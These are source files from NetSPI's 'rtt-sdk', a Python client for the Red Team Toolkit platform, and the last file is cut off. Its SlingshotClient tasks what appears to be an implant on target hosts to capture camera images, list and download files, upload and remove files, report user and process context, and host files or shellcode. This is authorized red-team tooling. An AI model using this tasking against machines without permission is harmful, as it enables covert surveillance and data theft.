# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 NetSPI <rtt.support@netspi.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.
"""
Scripting SDK for the Red Team Toolkit platform
"""

from rtt_sdk.__version__ import *  # noqa
from rtt_sdk.client import RTTClient  # noqa
from rtt_sdk.exceptions import *  # noqa
from rtt_sdk.slingshot import SlingshotClient  # noqa



# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 NetSPI <rtt.support@netspi.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

import os

from rtt_sdk.models import TaskDelivery, TaskStatus


def get_current_file_name() -> str:
    return os.path.basename(__file__)


def is_task_finished(delivery: TaskDelivery) -> bool:
    return delivery in [TaskDelivery.completed, TaskDelivery.blocked, TaskDelivery.invalid]


def is_task_failed(status: TaskStatus) -> bool:
    return status in [TaskStatus.failure, TaskStatus.warning, TaskStatus.critical]



# Taken from https://github.com/tiangolo/fastapi/blob/master/fastapi/openapi/models.py

# The MIT License (MIT)

# Copyright (c) 2018 Sebastián Ramírez

# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:

# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.

# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.

from enum import Enum
from typing import Any, Dict, List, Optional, Union

from pydantic import AnyUrl, BaseModel, Field


class Contact(BaseModel):
    name: Optional[str] = None
    url: Optional[AnyUrl] = None
    email: Optional[str] = None


class License(BaseModel):
    name: str
    url: Optional[AnyUrl] = None


class Info(BaseModel):
    title: str
    description: Optional[str] = None
    termsOfService: Optional[str] = None
    contact: Optional[Contact] = None
    license: Optional[License] = None
    version: str


class ServerVariable(BaseModel):
    enum: Optional[List[str]] = None
    default: str
    description: Optional[str] = None


class Server(BaseModel):
    url: Union[AnyUrl, str]
    description: Optional[str] = None
    variables: Optional[Dict[str, ServerVariable]] = None


class Reference(BaseModel):
    ref: str = Field(..., alias="$ref")


class Discriminator(BaseModel):
    propertyName: str
    mapping: Optional[Dict[str, str]] = None


class XML(BaseModel):
    name: Optional[str] = None
    namespace: Optional[str] = None
    prefix: Optional[str] = None
    attribute: Optional[bool] = None
    wrapped: Optional[bool] = None


class ExternalDocumentation(BaseModel):
    description: Optional[str] = None
    url: AnyUrl


class SchemaBase(BaseModel):
    ref: Optional[str] = Field(None, alias="$ref")
    title: Optional[str] = None
    multipleOf: Optional[float] = None
    maximum: Optional[float] = None
    exclusiveMaximum: Optional[float] = None
    minimum: Optional[float] = None
    exclusiveMinimum: Optional[float] = None
    maxLength: Optional[int] = Field(None, gte=0)
    minLength: Optional[int] = Field(None, gte=0)
    pattern: Optional[str] = None
    maxItems: Optional[int] = Field(None, gte=0)
    minItems: Optional[int] = Field(None, gte=0)
    uniqueItems: Optional[bool] = None
    maxProperties: Optional[int] = Field(None, gte=0)
    minProperties: Optional[int] = Field(None, gte=0)
    required: Optional[List[str]] = None
    enum: Optional[List[Any]] = None
    type: Optional[str] = None
    allOf: Optional[List[Any]] = None
    oneOf: Optional[List[Any]] = None
    anyOf: Optional[List[Any]] = None
    not_: Optional[Any] = Field(None, alias="not")
    items: Optional[Any] = None
    properties: Optional[Dict[str, Any]] = None
    additionalProperties: Optional[Union[Dict[str, Any], bool]] = None
    description: Optional[str] = None
    format: Optional[str] = None
    default: Optional[Any] = None
    nullable: Optional[bool] = None
    discriminator: Optional[Discriminator] = None
    readOnly: Optional[bool] = None
    writeOnly: Optional[bool] = None
    xml: Optional[XML] = None
    externalDocs: Optional[ExternalDocumentation] = None
    example: Optional[Any] = None
    deprecated: Optional[bool] = None


class Schema(SchemaBase):
    allOf: Optional[List[SchemaBase]] = None
    oneOf: Optional[List[SchemaBase]] = None
    anyOf: Optional[List[SchemaBase]] = None
    not_: Optional[SchemaBase] = Field(None, alias="not")
    items: Optional[SchemaBase] = None
    properties: Optional[Dict[str, SchemaBase]] = None
    additionalProperties: Optional[Union[Dict[str, Any], bool]] = None


class Example(BaseModel):
    summary: Optional[str] = None
    description: Optional[str] = None
    value: Optional[Any] = None
    externalValue: Optional[AnyUrl] = None


class ParameterInType(Enum):
    query = "query"
    header = "header"
    path = "path"
    cookie = "cookie"


class Encoding(BaseModel):
    contentType: Optional[str] = None
    # Workaround OpenAPI recursive reference, using Any
    headers: Optional[Dict[str, Union[Any, Reference]]] = None
    style: Optional[str] = None
    explode: Optional[bool] = None
    allowReserved: Optional[bool] = None


class MediaType(BaseModel):
    schema_: Optional[Union[Schema, Reference]] = Field(None, alias="schema")
    example: Optional[Any] = None
    examples: Optional[Dict[str, Union[Example, Reference]]] = None
    encoding: Optional[Dict[str, Encoding]] = None


class ParameterBase(BaseModel):
    description: Optional[str] = None
    required: Optional[bool] = None
    deprecated: Optional[bool] = None
    # Serialization rules for simple scenarios
    style: Optional[str] = None
    explode: Optional[bool] = None
    allowReserved: Optional[bool] = None
    schema_: Optional[Union[Schema, Reference]] = Field(None, alias="schema")
    example: Optional[Any] = None
    examples: Optional[Dict[str, Union[Example, Reference]]] = None
    # Serialization rules for more complex scenarios
    content: Optional[Dict[str, MediaType]] = None


class Parameter(ParameterBase):
    name: str
    in_: ParameterInType = Field(..., alias="in")


class Header(ParameterBase):
    pass


# Workaround OpenAPI recursive reference
class EncodingWithHeaders(Encoding):
    headers: Optional[Dict[str, Union[Header, Reference]]] = None


class RequestBody(BaseModel):
    description: Optional[str] = None
    content: Dict[str, MediaType]
    required: Optional[bool] = None


class Link(BaseModel):
    operationRef: Optional[str] = None
    operationId: Optional[str] = None
    parameters: Optional[Dict[str, Union[Any, str]]] = None
    requestBody: Optional[Union[Any, str]] = None
    description: Optional[str] = None
    server: Optional[Server] = None


class Response(BaseModel):
    description: str
    headers: Optional[Dict[str, Union[Header, Reference]]] = None
    content: Optional[Dict[str, MediaType]] = None
    links: Optional[Dict[str, Union[Link, Reference]]] = None


class Operation(BaseModel):
    tags: Optional[List[str]] = None
    summary: Optional[str] = None
    description: Optional[str] = None
    externalDocs: Optional[ExternalDocumentation] = None
    operationId: Optional[str] = None
    parameters: Optional[List[Union[Parameter, Reference]]] = None
    requestBody: Optional[Union[RequestBody, Reference]] = None
    responses: Dict[str, Response]
    # Workaround OpenAPI recursive reference
    callbacks: Optional[Dict[str, Union[Dict[str, Any], Reference]]] = None
    deprecated: Optional[bool] = None
    security: Optional[List[Dict[str, List[str]]]] = None
    servers: Optional[List[Server]] = None


class PathItem(BaseModel):
    ref: Optional[str] = Field(None, alias="$ref")
    summary: Optional[str] = None
    description: Optional[str] = None
    get: Optional[Operation] = None
    put: Optional[Operation] = None
    post: Optional[Operation] = None
    delete: Optional[Operation] = None
    options: Optional[Operation] = None
    head: Optional[Operation] = None
    patch: Optional[Operation] = None
    trace: Optional[Operation] = None
    servers: Optional[List[Server]] = None
    parameters: Optional[List[Union[Parameter, Reference]]] = None


# Workaround OpenAPI recursive reference
class OperationWithCallbacks(BaseModel):
    callbacks: Optional[Dict[str, Union[Dict[str, PathItem], Reference]]] = None


class SecuritySchemeType(Enum):
    apiKey = "apiKey"
    http = "http"
    oauth2 = "oauth2"
    openIdConnect = "openIdConnect"


class SecurityBase(BaseModel):
    type_: SecuritySchemeType = Field(..., alias="type")
    description: Optional[str] = None


class APIKeyIn(Enum):
    query = "query"
    header = "header"
    cookie = "cookie"


class APIKey(SecurityBase):
    type_ = Field(SecuritySchemeType.apiKey, alias="type")
    in_: APIKeyIn = Field(..., alias="in")
    name: str


class HTTPBase(SecurityBase):
    type_ = Field(SecuritySchemeType.http, alias="type")
    scheme: str


class HTTPBearer(HTTPBase):
    scheme = "bearer"
    bearerFormat: Optional[str] = None


class OAuthFlow(BaseModel):
    refreshUrl: Optional[str] = None
    scopes: Dict[str, str] = {}


class OAuthFlowImplicit(OAuthFlow):
    authorizationUrl: str


class OAuthFlowPassword(OAuthFlow):
    tokenUrl: str


class OAuthFlowClientCredentials(OAuthFlow):
    tokenUrl: str


class OAuthFlowAuthorizationCode(OAuthFlow):
    authorizationUrl: str
    tokenUrl: str


class OAuthFlows(BaseModel):
    implicit: Optional[OAuthFlowImplicit] = None
    password: Optional[OAuthFlowPassword] = None
    clientCredentials: Optional[OAuthFlowClientCredentials] = None
    authorizationCode: Optional[OAuthFlowAuthorizationCode] = None


class OAuth2(SecurityBase):
    type_ = Field(SecuritySchemeType.oauth2, alias="type")
    flows: OAuthFlows


class OpenIdConnect(SecurityBase):
    type_ = Field(SecuritySchemeType.openIdConnect, alias="type")
    openIdConnectUrl: str


SecurityScheme = Union[APIKey, HTTPBase, OAuth2, OpenIdConnect, HTTPBearer]


class Components(BaseModel):
    schemas: Optional[Dict[str, Union[Schema, Reference]]] = None
    responses: Optional[Dict[str, Union[Response, Reference]]] = None
    parameters: Optional[Dict[str, Union[Parameter, Reference]]] = None
    examples: Optional[Dict[str, Union[Example, Reference]]] = None
    requestBodies: Optional[Dict[str, Union[RequestBody, Reference]]] = None
    headers: Optional[Dict[str, Union[Header, Reference]]] = None
    securitySchemes: Optional[Dict[str, Union[SecurityScheme, Reference]]] = None
    links: Optional[Dict[str, Union[Link, Reference]]] = None
    callbacks: Optional[Dict[str, Union[Dict[str, PathItem], Reference]]] = None


class Tag(BaseModel):
    name: str
    description: Optional[str] = None
    externalDocs: Optional[ExternalDocumentation] = None


class OpenAPI(BaseModel):
    openapi: str
    info: Info
    servers: Optional[List[Server]] = None
    paths: Dict[str, PathItem]
    components: Optional[Components] = None
    security: Optional[List[Dict[str, List[str]]]] = None
    tags: Optional[List[Tag]] = None
    externalDocs: Optional[ExternalDocumentation] = None



import datetime
from typing import TYPE_CHECKING

import fastapi.openapi.models
from pydantic import BaseConfig, BaseModel, validator
from pydantic.main import Extra

if TYPE_CHECKING:
    from dataclasses import dataclass
else:

    def dataclass(model):
        return model


autocomplete = dataclass

# Allow custom field additions in schema objects (x-thing)
fastapi.openapi.models.SchemaBase.__config__.extra = Extra.allow


def convert_datetime_to_realworld(dt: datetime.datetime) -> str:
    return dt.replace(tzinfo=datetime.timezone.utc).isoformat().replace("+00:00", "Z")


def convert_field_to_camel_case(string: str) -> str:
    return "".join(word if index == 0 else word.capitalize() for index, word in enumerate(string.split("_")))


class Schema(BaseModel):
    class Config(BaseConfig):
        orm_mode = True
        allow_population_by_field_name = True
        json_encoders = {datetime.datetime: convert_datetime_to_realworld}
        alias_generator = convert_field_to_camel_case

    @validator("*", pre=True)
    def not_none(cls, v, field):
        if field.default and v is None:
            return field.default
        else:
            return v



# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 NetSPI <rtt.support@netspi.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.


import asyncio
import os
from os import PathLike
from typing import List, Optional, Union, cast

from requests import Session
from rtt_sdk import models
from rtt_sdk.__version__ import __title__, __version__
from rtt_sdk.client import RTTClient


class SlingshotClient(RTTClient):
    def __init__(
        self,
        url: Optional[str] = os.environ.get("RTT_PLATFORM_SERVER", None),
        token: Optional[str] = os.environ.get("RTT_PLATFORM_TOKEN", None),
        instance: Optional[str] = cast(models.Tool, os.environ.get("RTT_PLATFORM_INSTANCE", None)),
        loop: Optional[asyncio.AbstractEventLoop] = None,
        debug: bool = False,
        interactive: bool = True,
        session: Optional[Session] = None,
        ssl_verify: bool = True,
        user_agent: str = f"{__title__}/{__version__}",
    ):
        super().__init__(
            tool=models.Tool.slingshot,
            url=url,
            token=token,
            instance=instance,
            loop=loop,
            debug=debug,
            interactive=interactive,
            session=session,
            ssl_verify=ssl_verify,
            user_agent=user_agent,
        )

    async def camera_capture_raw(
        self,
        camera_id: int,
        quality: Optional[int] = None,
        *,
        instance: Optional[Union[models.InstanceInResponse, str]] = None,
    ) -> models.CameraCaptureResults:
        arguments = models.CameraCaptureArguments(camera_id, quality)
        task = await self.create_task_and_wait(arguments, instance=instance)
        return models.CameraCaptureResults(**task.results.dict())

    async def camera_capture(
        self,
        camera_id: int,
        quality: Optional[int] = None,
        *,
        instance: Optional[Union[models.InstanceInResponse, str]] = None,
    ) -> bytes:
        raise NotImplementedError

    async def camera_list(
        self, instance: Optional[Union[models.InstanceInResponse, str]] = None
    ) -> List[models.Camera]:
        arguments = models.CameraListArguments()
        task = await self.create_task_and_wait(arguments, instance=instance)
        return models.CameraListResults(**task.results.dict()).cameras or []

    async def context_idle(self, *, instance: Optional[Union[models.InstanceInResponse, str]] = None) -> int:
        arguments = models.ContextIdleArguments()
        task = await self.create_task_and_wait(arguments, instance=instance)
        results = models.ContextIdleResults(**task.results.dict())
        if not results.minutes:
            raise KeyError
        return results.minutes

    async def context_process(
        self, *, instance: Optional[Union[models.InstanceInResponse, str]] = None
    ) -> models.ContextProcessResults:
        arguments = models.ContextProcessArguments()
        task = await self.create_task_and_wait(arguments, instance=instance)
        return models.ContextProcessResults(**task.results.dict())

    async def context_user(
        self, verbose: bool, *, instance: Optional[Union[models.InstanceInResponse, str]] = None
    ) -> models.ContextUserResults:
        arguments = models.ContextUserArguments(verbose=verbose)
        task = await self.create_task_and_wait(arguments, instance=instance)
        return models.ContextUserResults(**task.results.dict())

    async def exit(self, *, instance: Optional[Union[models.InstanceInResponse, str]] = None) -> None:
        arguments = models.ExitArguments()
        await self.create_task_and_wait(arguments, instance=instance)

    async def file_change_directory(
        self, directory: Optional[str] = None, *, instance: Optional[Union[models.InstanceInResponse, str]] = None
    ) -> str:
        arguments = models.FileChangeDirectoryArguments(directory)
        task = await self.create_task_and_wait(arguments, instance=instance)
        results = models.FileChangeDirectoryResults(**task.results.dict())
        if not results.directory:
            raise KeyError
        return results.directory

    async def file_copy(
        self,
        source: str,
        destination: str,
        force: Optional[bool] = None,
        *,
        instance: Optional[Union[models.InstanceInResponse, str]] = None,
    ) -> None:
        arguments = models.FileCopyArguments(source=source, destination=destination, force=force)
        await self.create_task_and_wait(arguments, instance=instance)

    async def file_download_raw(
        self, path: str, *, instance: Optional[Union[models.InstanceInResponse, str]] = None
    ) -> models.FileDownloadResults:
        arguments = models.FileDownloadArguments(path=path)
        task = await self.create_task_and_wait(arguments, instance=instance)
        return models.FileDownloadResults(**task.results.dict())

    async def file_download(
        self, path: str, *, instance: Optional[Union[models.InstanceInResponse, str]] = None
    ) -> bytes:
        raise NotImplementedError

    async def file_list(
        self,
        directory: str,
        *,
        time_format: Optional[models.TimeFormat] = None,
        instance: Optional[Union[models.InstanceInResponse, str]] = None,
    ) -> List[models.FileOrDirectory]:
        arguments = models.FileListArguments(directory=directory, time_format=time_format)
        task = await self.create_task_and_wait(arguments, instance=instance)
        return models.FileListResults(**task.results.dict()).entries or []

    async def file_make_directory(
        self, path: str, *, instance: Optional[Union[models.InstanceInResponse, str]] = None
    ) -> None:
        arguments = models.FileMakeDirectoryArguments(path=path)
        await self.create_task_and_wait(arguments, instance=instance)

    async def file_move(
        self,
        source: str,
        destination: str,
        *,
        force: Optional[bool] = None,
        instance: Optional[Union[models.InstanceInResponse, str]] = None,
    ) -> None:
        arguments = models.FileMoveArguments(source=source, destination=destination, force=force)
        await self.create_task_and_wait(arguments, instance=instance)

    async def file_remove(
        self,
        path: str,
        *,
        force: Optional[bool] = None,
        instance: Optional[Union[models.InstanceInResponse, str]] = None,
    ) -> None:
        arguments = models.FileRemoveArguments(path=path, force=force)
        await self.create_task_and_wait(arguments, instance=instance)

    async def file_upload_raw(
        self,
        path: str,
        data: models.BlobReferenceOrData,
        *,
        force: Optional[bool] = None,
        instance: Optional[Union[models.InstanceInResponse, str]] = None,
    ) -> None:
        arguments = models.FileUploadArguments(data=data, path=path, force=force)
        await self.create_task_and_wait(arguments, instance=instance)

    async def file_upload(
        self,
        path: str,
        data: Union[bytes, PathLike, str],
        *,
        force: Optional[bool] = None,
        instance: Optional[Union[models.InstanceInResponse, str]] = None,
    ) -> None:
        raise NotImplementedError

    async def host_file_raw(
        self,
        endpoint: str,
        data: models.BlobReferenceOrData,
        *,
        base_url: Optional[str] = None,
        encoding: Optional[models.HostingEncoding] = None,
        instance: Optional[Union[models.InstanceInResponse, str]] = None,
    ) -> str:
        arguments = models.HostFileArguments(data=data, base_url=base_url, endpoint=endpoint, encoding=encoding)
        task = await self.create_task_and_wait(arguments, instance=instance)
        results = models.HostFileResults(**task.results.dict())
        if not results.url:
            raise KeyError
        return results.url

    async def host_file(
        self,
        endpoint: str,
        data: Union[bytes, PathLike, str],
        *,
        base_url: Optional[str] = None,
        encoding: Optional[models.HostingEncoding] = None,
        instance: Optional[Union[models.InstanceInResponse, str]] = None,
    ) -> None:
        raise NotImplementedError

    async def host_shellcode(
        self,
        endpoint: str,
        data: Union[bytes, PathLike, str],
        *,
        base_url: Optional[str] = None,
        encoding: Optional[models.HostingEncoding] = None,
        instance: Optional[Union[models.InstanceInResponse, str]] = None,
    ) -> None:
        raise NotImplementedError



# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 NetSPI <rtt.support@netspi.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

import asyncio
import json
import os
import sys
import time
import webbrowser
from typing import Any, Dict, List, Optional, Union, cast

from requests import Response, Session

from rtt_sdk import exceptions, logging
from rtt_sdk.__version__ import __compatible_schema_version__, __title__, __version__
from rtt_sdk.helpers import get_current_file_name, is_task_failed, is_task_finished
from rtt_sdk.models import InstanceInResponse, ScriptArguments, TaskContext, TaskDetails, Tool
from rtt_sdk.openapi import OpenAPI, RequestBody
from rtt_sdk.schema import Schema
from rtt_sdk.stream import WebsocketStream

JSONResponse = Dict[str, Any]
ServerResponse = Union[JSONResponse, bytes]

#
# TODO List:
#
# - Race condition for setting up the websocket vs first task
# - Raise exceptions for tasks with bad statuses (error_info transforms)
# - Expose the feed subscription with callback registrations
# - Add a generic instance/task query APIs
# - Overload RTTClient init in Slingshot client to remove "tool" arg
# - Parameterize the get/post functions more
# - Add docstrings to everything
# - Dynamic class construction for ssclient.context.user
# - Look at alias function names (getuid, etc.)


class RTTClient:
    """
    Represents a RTT platform server client connection.

    Args:
        url: Platform server URL (otherwise from ENV).
        token: Authentication token (otherwise from ENV).
        ssl_verify: SSL certificate verification
    """

    def __init__(
        self,
        url: Optional[str] = os.environ.get("RTT_PLATFORM_SERVER", None),
        token: Optional[str] = os.environ.get("RTT_PLATFORM_TOKEN", None),
        tool: Optional[Tool] = cast(Tool, os.environ.get("RTT_PLATFORM_TOOL", None)),
        instance: Optional[str] = cast(Tool, os.environ.get("RTT_PLATFORM_INSTANCE", None)),
        loop: Optional[asyncio.AbstractEventLoop] = None,
        debug: bool = False,
        interactive: bool = True,
        session: Optional[Session] = None,
        ssl_verify: bool = True,
        user_agent: str = f"{__title__}/{__version__}",
    ):
        if not url:
            raise ValueError("url is a required parameter")
        if not tool:
            raise ValueError("tool is a required parameter")

        if not loop:
            loop = asyncio.get_running_loop()

        self._debug = debug
        self._tool = tool
        self._instance = instance
        self._url = url.rstrip("/")
        self._api_url = f"{self._url}/api"
        self._session = session or Session()
        self._session.verify = ssl_verify
        self._task_events: Dict[str, asyncio.Event] = {}
        self._task_store: Dict[str, TaskDetails] = {}

        try:
            schema_text = self._session.get(f"{self._url}/openapi.json").text
            self._schema: OpenAPI = OpenAPI(**json.loads(schema_text))
        except Exception as e:
            raise exceptions.RTTServerError from e

        if self._schema.info.version != __compatible_schema_version__:
            raise exceptions.RTTIncompatibleServer(f"{self._schema.info.version} != {__compatible_schema_version__}")

        self._tasks_schema_map = self._parse_schema()

        if not token:
            if interactive:
                token = self.get_token_interactive()
            else:
                raise ValueError("token is a required parameter")

        self._headers = {"User-Agent": user_agent, "Authorization": f"Bearer {token}"}

        self._task_stream = WebsocketStream(self, f"{self._api_url}/{self._tool}/tasks/feed")
        self._task_stream.add_callback(self._task_stream_callback)
        self._task_stream_task = asyncio.create_task(self._task_stream.connect())

    def __enter__(self):
        return self

    def __exit__(self, *args):
        self._session.close()

    def _task_stream_callback(self, data: bytes):
        task = TaskDetails(**json.loads(data))
        task_id = str(task.id)

        if task.command == "Script":
            return

        self._task_store[task_id] = task
        if task_id not in self._task_events:
            self._task_events[task_id] = asyncio.Event()
        if is_task_finished(self._task_store[task_id].delivery):
            self._task_events[task_id].set()

    def _parse_schema(self) -> Dict[str, str]:
        map: Dict[str, str] = {}
        for path, info in self._schema.paths.items():
            if "/tasks/" not in path or not info.post:
                continue
            if not isinstance(info.post.requestBody, RequestBody):
                raise exceptions.RTTParsingError("Server schema is invalid")
            try:
                schema_ref = info.post.requestBody.content["application/json"].schema_.ref
                schema_name = schema_ref.split("/")[-1]
                _ = getattr(sys.modules["rtt_sdk.models"], schema_name)
                map[schema_name] = path
            except Exception as e:
                raise exceptions.RTTParsingError from e
        return map

    def set_instance(self, instance: Union[InstanceInResponse, str]) -> None:
        self._instance = instance.id if isinstance(instance, InstanceInResponse) else instance

    def request(
        self,
        verb: str,
        path: str,
        query_data: Dict = {},
        post_data: Optional[Dict] = None,
        multi_part: Optional[Dict] = None,
        **kwargs,
    ) -> Response:
        """
        Make an HTTP request to the platform server.

        Args:
            verb: The HTTP method to call ('get', 'post', 'put', 'delete')
            path: Path or full URL to query ('/sub' or 'http://server/sub')
            query_data: Data to send as query parameters
            post_data: Data to send in the body (as json)
            multi_part: Multi-part form data (files)
            **kwargs: Extra options for the request
        Returns:
            A requests result object.
        Raises:
            RTTAuthenticationError: When authentication is invalid
            RTTValidationError: When the request structure is invalid
            RTTHttpError: For any other HTTP errors
        """
        if path.startswith("http://") or path.startswith("https://"):
            url = path
        else:
            url = f"{self._api_url}/{path.lstrip('/')}"
            url = url.replace("/api/api/", "/api/")  # TODO: I know...

        if "context" not in query_data:
            query_data["context"] = TaskContext.script

        if "{tool}" in url and self._tool:
            url = url.replace("{tool}", self._tool)

        # TODO: Handle retries
        response = self._session.request(
            verb,
            url,
            headers=getattr(self, "_headers", {}),
            params=query_data,
            json=post_data,
            files=multi_part,
            **kwargs,
        )
        if self._debug:
            logging.debug(f"[{response.status_code}] {url} : {response.content.decode(errors='replace')}")
        if 200 <= response.status_code < 300:
            return response

        error_message: Union[bytes, str] = response.content
        try:
            error_message = response.json()["detail"]
            if isinstance(error_message, list):
                error_message = error_message[0]["msg"]
        except (KeyError, ValueError, TypeError):
            pass

        error_class = exceptions.RTTHttpError
        if response.status_code == 400:
            error_class = exceptions.RTTValidationError
        elif response.status_code == 401:
            error_class = exceptions.RTTAuthenticationError

        raise error_class(
            response_code=response.status_code,
            message=error_message,
            response_body=response.content,
        )

    def _convert_to_json(self, response: Response) -> JSONResponse:
        if response.headers["Content-Type"] == "application/json":
            try:
                return response.json()
            except Exception as e:
                raise exceptions.RTTParsingError(message="Failed to parse the server message") from e
        else:
            raise exceptions.RTTParsingError(
                message=f'Server content type is invalid: {response.headers["Content-Type"]}',
                response_body=response.content,
            )

    def get(self, path: str, *args, **kwargs) -> JSONResponse:
        return self._convert_to_json(self.request("get", path, *args, **kwargs))

    def post(self, path: str, *args, **kwargs) -> JSONResponse:
        return self._convert_to_json(self.request("post", path, *args, **kwargs))

    def put(self, path: str, *args, **kwargs) -> JSONResponse:
        return self._convert_to_json(self.request("put", path, *args, **kwargs))

    def get_token_interactive(self) -> str:
        auth_start = self.get(f"/{self._tool}/scripts/auth/start")
        logging.success(f'Script authentication requested: {auth_start["verifyUrl"]}')
        webbrowser.open(auth_start["verifyUrl"])

        script_arguments = ScriptArguments(name=get_current_file_name())

        max_attempts = 30
        sleep_delay = 2
        while max_attempts > 0:
            max_attempts -= 1
            try:
                auth_finish = self.post(auth_start["finishUrl"], post_data=script_arguments.dict())
                return auth_finish["access_token"]
            except exceptions.RTTHttpError as e:
                if e.response_code not in [401, 403]:
                    raise e
                time.sleep(sleep_delay)
        raise exceptions.RTTAuthenticationTimedOut

    def get_instances(self, tool: Optional[Tool] = None) -> List[InstanceInResponse]:
        tool = tool if tool else self._tool
        return [InstanceInResponse(**i) for i in cast(List[Any], self.get(f"/{tool}/instances"))]

    def create_task(self, arguments: Schema, instance: Optional[Union[InstanceInResponse, str]] = None) -> TaskDetails:
        schema_name = arguments.__class__.__name__
        if schema_name not in self._tasks_schema_map.keys():
            raise ValueError(f"Schema object for create_task is invalid: {arguments}")
        endpoint = self._tasks_schema_map[schema_name]
        if "{instance}" in endpoint:
            if instance:
                instance_id = instance.id if isinstance(instance, InstanceInResponse) else instance
            elif self._instance:
                instance_id = self._instance
            else:
                raise ValueError("Cannot create tasking without specifying a target instance")
            endpoint = endpoint.replace("{instance}", str(instance_id))
        task = TaskDetails(**self.post(endpoint, post_data=arguments.dict()))
        return task

    async def create_task_and_wait(
        self, arguments: Schema, instance: Optional[Union[InstanceInResponse, str]] = None
    ) -> TaskDetails:
        task = self.create_task(arguments, instance=instance)
        task_id = str(task.id)

        if not self._task_stream.cursor:
            self._task_stream.cursor = task_id

        if task_id not in self._task_events:
            self._task_events[task_id] = asyncio.Event()

        await self._task_events[task_id].wait()
        task = self._task_store[task_id]

        if is_task_failed(task.status):
            if task.results.error_info:
                raise exceptions.RTTTaskError(task.results.error_info)
            else:
                raise exceptions.RTTError("A task failed, but no error information was returned")
        return task



import setuptools


def get_version():
    with open("rtt_sdk/__version__.py") as f:
        for line in f:
            if line.startswith("__version__"):
                return eval(line.split("=")[-1])


with open("README.md", "r", encoding="utf-8") as fh:
    long_description = fh.read()

setuptools.setup(
    name="rtt-sdk",
    version=get_version(),
    author="Nick Landers, NetSPI",
    author_email="rtt.support@netspi.com",
    description="Scripting SDK for the Red Team Toolkit platform",
    long_description=long_description,
    long_description_content_type="text/markdown",
    url="https://netspi.com",
    packages=setuptools.find_packages(),
    classifiers=[
        "Development Status :: 4 - Beta",
        "Programming Language :: Python :: 3",
        "License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)",
        "Operating System :: OS Independent",
    ],
    python_requires=">=3.7",
)



# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 NetSPI <rtt.support@netspi.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

__author__ = "Nick Landers, NetSPI"
__copyright__ = "2021 NetSPI"
__email__ = "rtt.support@netspi.com"
__license__ = "LGPL3"
__title__ = "rtt-sdk"
__version__ = "0.1.2"

__compatible_schema_version__ = "0.5.6"



# -*- coding: utf-8 -*-
#
# Copyright (C) 2021 NetSPI <rtt.support@netspi.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.

import functools
from typing import TYPE_CHECKING, Optional, Union

if TYPE_CHECKING:
    from rtt_sdk.models import TaskErrorInfo


class RTTError(Exception):
    def __init__(
        self,
        message: Union[str, bytes] = "",
        response_code: Optional[int] = None,
        response_body: Union[str, bytes] = None,
    ):
        super().__init__(self, message)
        self.response_code = response_code
        if isinstance(response_body, bytes):
            self.response_body = response_body.decode()
        else:
            self.response_body = response_body
        if isinstance(message, bytes):
